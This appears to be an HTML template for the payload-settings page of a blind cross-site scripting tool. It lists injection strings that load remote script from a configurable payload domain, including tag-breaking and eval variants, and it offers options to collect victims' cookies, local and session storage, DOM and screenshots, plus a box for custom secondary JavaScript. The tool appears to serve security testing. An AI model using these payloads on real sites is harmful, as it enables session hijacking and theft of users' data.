<div class="wrapper">

    {{menu}}

    <section class="content">
        <div class="container-fluid">
            <div class="row">
                <div class="col-lg-12">
                    <div class="view-header">
                        <div class="header-title">
                            <h3 class="m-b-xs">Payload</h3>
                            <small>Get an payload or update your custom payload</small>
                        </div>
                    </div>
                    <hr>
                </div>
            </div>

            <div class="row">

                <div class="col-lg-12">
                    <div id="alert"></div>
                </div>

                <div class="col-lg-6">
                    <div class="panel panel-filled">
                        <div class="panel-heading">Payloads</div>
                        <div class="panel-body">
                            <div class="form-group">
                                <label class="control-label">Script src</label>
                                <input class="form-control" disabled
                                       value='<script src=//{{setting[payload-domain]}}></script>'><br>

                                <label class="control-label">Script src with closing tag</label>
                                <input class="form-control" disabled
                                       value='"><script src=//{{setting[payload-domain]}}></script>'><br>

                                <label class="control-label">Script src with closing and opening tag</label>
                                <input class="form-control" disabled
                                       value='"><script src=//{{setting[payload-domain]}}></script><x="'><br>

                                <label class="control-label">jQuery</label>
                                <input class="form-control" disabled
                                       value='$.getScript("//{{setting[payload-domain]}}")'><br>

                                <label class="control-label">Create Element</label>
                                <input class="form-control"
                                       disabled value="javascript:eval('var a=document.createElement(\'script\');a.src=\'//{{setting[payload-domain]}}\';document.body.appendChild(a)')"><br>

                                <label class="control-label">Custom Payload example</label>
                                <input class="form-control" disabled
                                       value='<script src=//{{setting[payload-domain]}}/custom></script>'><br>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-lg-6">
                    <div class="panel panel-filled">
                        <div class="panel-heading">Collecting</div>
                        <div class="panel-body">
                            <form class="form" id="collecting" method="post">
                                {{csrf[]}}
                                <div class="row">
                                    <div class="col-lg-6">
                                        <div class="form-group">
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[uri]" {{collectSelected[uri]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">URL</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[ip]" {{collectSelected[ip]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">IP</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[referer]" {{collectSelected[referer]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">Referer</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[user-agent]" {{collectSelected[user-agent]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">User Agent</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[cookies]" {{collectSelected[cookies]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">Cookies</p>
                                        </div>
                                    </div>
                                    <div class="col-lg-6">
                                        <div class="form-group">
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[localstorage]" {{collectSelected[localstorage]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">Local Storage</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[sessionstorage]" {{collectSelected[sessionstorage]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">Session Storage</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[dom]" {{collectSelected[dom]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">DOM</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[origin]" {{collectSelected[origin]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">Origin</p>
                                            <label class="checkbox-label" style="display:inline">
                                                <input class="chkbox" type="checkbox" name="selected" id="select[screenshot]" {{collectSelected[screenshot]}}>
                                                <span class="checkbox-custom rectangular"></span>
                                            </label>
                                            <p class="checkbox-text">Screenshot</p>
                                        </div>
                                    </div>
                                </div>
                                <button class="btn">Save</button>
                            </form>
                        </div>
                    </div>

                    <div class="panel panel-filled" style="height:270px">
                        <div class="panel-heading">Secondary Payload</div>
                        <div class="panel-body">
                            <form class="form" id="payload-settings">
                                <div class="form-group">
                                    {{csrf[]}}
                                    <label class="control-label" for="customjs">Custom javascript</label>
                                    <textarea class="form-control" id="customjs" name="customjs" rows=5 type="text">{{setting[customjs]}}</textarea>
                                </div>
                                <button class="btn">Save</button>
                            </form>
                        </div>
                    </div>
                </div>

            </div>

        </div>
    </section>
</div>
